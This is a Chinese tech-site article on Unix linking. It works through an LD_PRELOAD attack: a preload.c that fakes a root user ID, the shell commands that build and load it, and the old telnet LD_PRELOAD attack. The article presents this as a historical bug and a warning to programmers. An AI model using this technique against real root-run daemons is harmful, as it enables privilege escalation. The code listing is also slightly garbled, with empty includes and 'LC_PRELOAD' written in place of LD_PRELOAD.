列举Unix操作系统实例
创始人
2024-06-28 18:01:04
0

一般来说,Unix操作系统程序的链接分为静态链接和动态链接,静态链接就是把所有所引用到的函数或变量全部地编译到可执行文件中。动态链接则不会把函数编译到可执行文件中,而是在程序运行时动态地载入函数库,也就是运行链接。

让我们来一个Unix操作系统示例(这个示例来源于我的工作)。这个软件是一个分布式计算平台,软件在所有的计算机上都有以ROOT身份运行的侦听程序(Daemon),用户可以把的一程序从A计算机提交到B计算机上去运行。

这些Daemon会把用户在A计算机上的所有Unix操作系统环境变量带到B计算机上,在B计算机上的Daemon会fork出一个子进程,并且Daemon会调用seteuid、setegid来设置子程的执行宿主,并在子进程空间中设置从A计算机带过来的环境变量,以仿真用户的运行环境。(注意:A和B都运行在NIS/NFS方式上)

于是,我们可以写下这样的动态链接库:
 

  1. /* 文件名:preload.c */  
  2. #include  
  3. #include  
  4. #include  
  5. uid_t geteuid( void ) { return 0; }  
  6. uid_t getuid( void ) { return 0; }  
  7. uid_t getgid( void ) { return 0; } 


 
在这里我们可以看到,我们重载了Unix操作系统调用。于是我们可以通过设置LC_PRELOAD来迫使主程序使用我们的geteuid/getuid/getgid(它们都返回0,也就是Root权限)。这会导致,上述的那个分布式计算平台的软件在提交端A计算机上调用了geteuid得到当前用户ID是0,并把这个用户ID传到了执行端B计算机上,于是B计算机上的Daemon就会调用seteuid(0),导致我们的程序运行在了Root权限之下。从而,用户取得了超级用户的权限而为所欲为。

上面的这个preload.c文件也就早期的为人所熟知的hack程序了。恶意用户通过在系统中设计LC_PRELOAD环境变量来加载这个动态链接库,会非常容易影响其它Unix操作系统命令(如:/bin/sh, /bin/ls, /bin/rm 等),让这些系统命令以Root权限运行。

让我们看一下这个函数是怎么影响Unix操作系统命令的:
 

  1. $ id  
  2. uid=500(hchen) gid=10(wheel) groups=10(wheel)  
  3. $ gcc -shared -o preload.so preload.c  
  4. $ setenv LD_PRELOAD ./preload.so  
  5. $ id  
  6. uid=0(root) gid=0(root) egid=10(wheel) groups=10(wheel)  
  7. $ whoami  
  8. root  
  9. $ /bin/sh   
  10. # <------ 你可以看到命令行提示符会由 $ 变成 # 

下面是一个曾经非常著名的系统攻击
 

  1. $ telnet  
  2. telnet> env def LD_PRELOAD /home/hchen/test/preload.so  
  3. telnet> open localhost  

当然,这个安全BUG早已被Fix了(虽然,通过id或是whoami或是/bin/sh让你觉得你像是root,但其实你并没有root的权限),当今的Unix操作系统中不会出现这个的问题。但这并不代表,我们自己写的程序,或是第三方的程序能够避免这个问题,尤其是那些以Root方式运行的第三方程序。所以,在我们编程时,我们要随时警惕着LD_PRELOAD。

关于Unix操作系统的示例我们就举出这个来给大家参考。

【编辑推荐】

  1. 浅析Unix操作系统set命令
  2. 实际运用Unix操作系统set命令
  3. Unix操作系统TCP/UDP知识
  4. 利用Unix操作系统重定向
  5. Unix操作系统与农村信用社

相关内容

热门资讯

PHP新手之PHP入门 PHP是一种易于学习和使用的服务器端脚本语言。只需要很少的编程知识你就能使用PHP建立一个真正交互的...
网络中立的未来 网络中立性是什... 《牛津词典》中对“网络中立”的解释是“电信运营商应秉持的一种原则,即不考虑来源地提供所有内容和应用的...
各种千兆交换机的数据接口类型详... 千兆交换机有很多值得学习的地方,这里我们主要介绍各种千兆交换机的数据接口类型,作为局域网的主要连接设...
粉嫩如何诠释霸道 东芝M805... “霸道粉”是个什么玩意东芝M805拿过来的时候,笔者扑哧笑了,不是笑这款笔记本,而是笑这款产品的颜色...
什么是大数据安全 什么是大数据... 在《为什么需要大数据安全分析》一文中,我们已经阐述了一个重要观点,即:安全要素信息呈现出大数据的特征...
如何利用交换机和端口设置来管理... 在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
全面诠释网络负载均衡 负载均衡的出现大大缓解了服务器的压力,更是有效的利用了资源,提高了效率。那么我们现在来说一下网络负载...
如何允许远程连接到MySQL数... [[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
30分钟搞定iOS自定义相机 最近公司的项目中用到了相机,由于不用系统的相机,UI给的相机切图,必须自定义才可以。就花时间简单研究...
Intel将Moblin社区控... 本周二,非营利机构Linux基金会宣布,他们将担负起Moblin社区的管理工作,而这之前,Mobli...